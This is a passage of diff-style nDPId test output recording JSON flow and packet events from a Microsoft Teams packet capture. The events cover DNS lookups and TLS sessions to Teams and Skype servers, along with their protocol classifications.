{"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"VoIP"},"dns": {"query":"eu-api.asm.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":865,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681714,"flow_last_seen":1587041681714,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1587041681714,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"VoIP"},"dns": 
{"query":"eu-api.asm.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":866,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681714,"flow_last_seen":1587041681714,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041681714,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":866,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1587041681714,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1587041681714,"pkt":"EBMx8Tl2KDc3AG3ICABFAABRU9EAAP8R5HLAqAEGwKgBAfaCADUAPVgfcugBAAABAAAAAAAAB2V1LXByb2QHYXN5bmNndwV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":866,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681714,"flow_last_seen":1587041681714,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041681714,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": 
{"query":"eu-prod.asyncgw.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":866,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681714,"flow_last_seen":1587041681714,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041681714,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"eu-prod.asyncgw.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1587041681744,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1587041681744,"pkt":"KDc3AG3IEBMx8Tl2CABFAAC9OkBAADkRg5jAqAEBwKgBBgA19oIAqQAAcuiBgAABAAMAAAAAB2V1LXByb2QHYXN5bmNndwV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAHADAAFAAEAAAvAACoVYXNtLWFwaS1wcm9kLWV1LXRlYW1zDnRyYWZmaWNtYW5hZ2VyA25ldADAQQAFAAEAAAEsABoOd2V1MS1hcGktdGVhbXMIY2xvdWRhcHDAZsB3AAEAAQAAAAoABDRyS0Y="} 
-00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":873,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681744,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1587041681744,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"eu-prod.asyncgw.teams.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.75.70"}} +00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":873,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681744,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1587041681744,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"eu-prod.asyncgw.teams.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.75.70"}} 
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":874,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681745,"flow_last_seen":1587041681745,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041681745,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1587041681745,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041681745,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VHAqAEGNHJLRux6AbuCUaOxAAAAALAC\/\/8ErAAAAgQFtAEDAwUBAQgKMISsLQAAAAAEAgAA"} 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":875,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1587041681754,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"thread_ts_msec":1587041681754,"pkt":"KDc3AG3IEBMx8Tl2CABFAACo\/M1AADkRwR\/AqAEBwKgBBgA1x1kAlAAAiC2BgAABAAMAAAAABmV1LWFwaQNhc20Fc2t5cGUDY29tAAABAAHADAAFAAEAAAb4ACQPYXNtLWFwaS1wcm9kLWV1DnRyYWZmaWNtYW5hZ2VyA25ldADAMgAFAAEAAAEsABoOd2V1MS1hcGktc2t5cGUIY2xvdWRhcHDAUcBiAAEAAQAAAAUABDRyS0U="} 
-00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":875,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681754,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041681754,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"eu-api.asm.skype.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.75.69"}} +00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":875,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681754,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041681754,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"eu-api.asm.skype.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.75.69"}} 
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":876,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681755,"flow_last_seen":1587041681755,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041681755,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":876,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1587041681755,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041681755,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VLAqAEGNHJLRex7AbtPkLhOAAAAALAC\/\/8ixgAAAgQFtAEDAwUBAQgKMISsNwAAAAAEAgAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":877,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1587041681772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041681772,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8MUxAAG0Gmwk0cktGwKgBBgG77HoxlVjpglGjsqASIACccwAAAgQFoAEDAwgEAggKVud31zCErC0="} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":878,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1587041681772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041681772,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V3AqAEGNHJLRux6AbuCUaOyMZVY6oAQEAnbCgAAAQEICjCErEZW53fX"} -00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":879,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041681745,"flow_last_seen":1587041681772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1587041681772,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-prod.asyncgw.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":879,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041681745,"flow_last_seen":1587041681772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1587041681772,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"eu-prod.asyncgw.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":880,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1587041681786,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041681786,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8PqJAAGwGjrQ0cktFwKgBBgG77HsaOOK2T5C4T6ASIABGlgAAAgQFoAEDAwgEAggKVN17aDCErDc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":881,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1587041681786,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041681786,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V7AqAEGNHJLRex7AbtPkLhPGjjit4AQEAmFKgAAAQEICjCErFNU3Xto"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":882,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041681755,"flow_last_seen":1587041681786,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041681786,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":882,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041681755,"flow_last_seen":1587041681786,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041681786,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00878{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":891,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041681745,"flow_last_seen":1587041681802,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":333,"midstream":0,"thread_ts_msec":1587041681802,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-prod.asyncgw.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00866{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":902,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041681755,"flow_last_seen":1587041681819,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1587041681819,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":932,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682076,"flow_last_seen":1587041682076,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682076,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1587041682076,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682076,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VHAqAEGNHJLRux8AbuMg\/cHAAAAALAC\/\/+l4gAAAgQFtAEDAwUBAQgKMIStbAAAAAAEAgAA"} 
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":933,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682077,"flow_last_seen":1587041682077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682077,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":933,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1587041682077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682077,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VLAqAEGNHJLRex9AbuFeblcAAAAALAC\/\/\/qlgAAAgQFtAEDAwUBAQgKMIStbQAAAAAEAgAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":934,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1587041682106,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041682106,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8XUVAAGwGcBA0cktGwKgBBgG77HwdJJF2jIP3CKASIACM5QAAAgQFoAEDAwgEAggKVscEoDCErWw="} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":935,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1587041682106,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682106,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V3AqAEGNHJLRux8AbuMg\/cIHSSRd4AQEAnLdwAAAQEICjCErYpWxwSg"} -00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":936,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682076,"flow_last_seen":1587041682107,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1587041682107,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-prod.asyncgw.teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":936,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682076,"flow_last_seen":1587041682107,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1587041682107,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"eu-prod.asyncgw.teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":937,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1587041682108,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041682108,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8CPlAAG0Gw100cktFwKgBBgG77H37toO1hXm5XaASIACQKwAAAgQFoAEDAwgEAggKVQ929DCErW0="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1587041682108,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682108,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V7AqAEGNHJLRex9AbuFebld+7aDtoAQEAnOvQAAAQEICjCErYtVD3b0"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":939,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682077,"flow_last_seen":1587041682108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041682108,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":939,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682077,"flow_last_seen":1587041682108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041682108,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":948,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682129,"flow_last_seen":1587041682129,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1587041682129,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
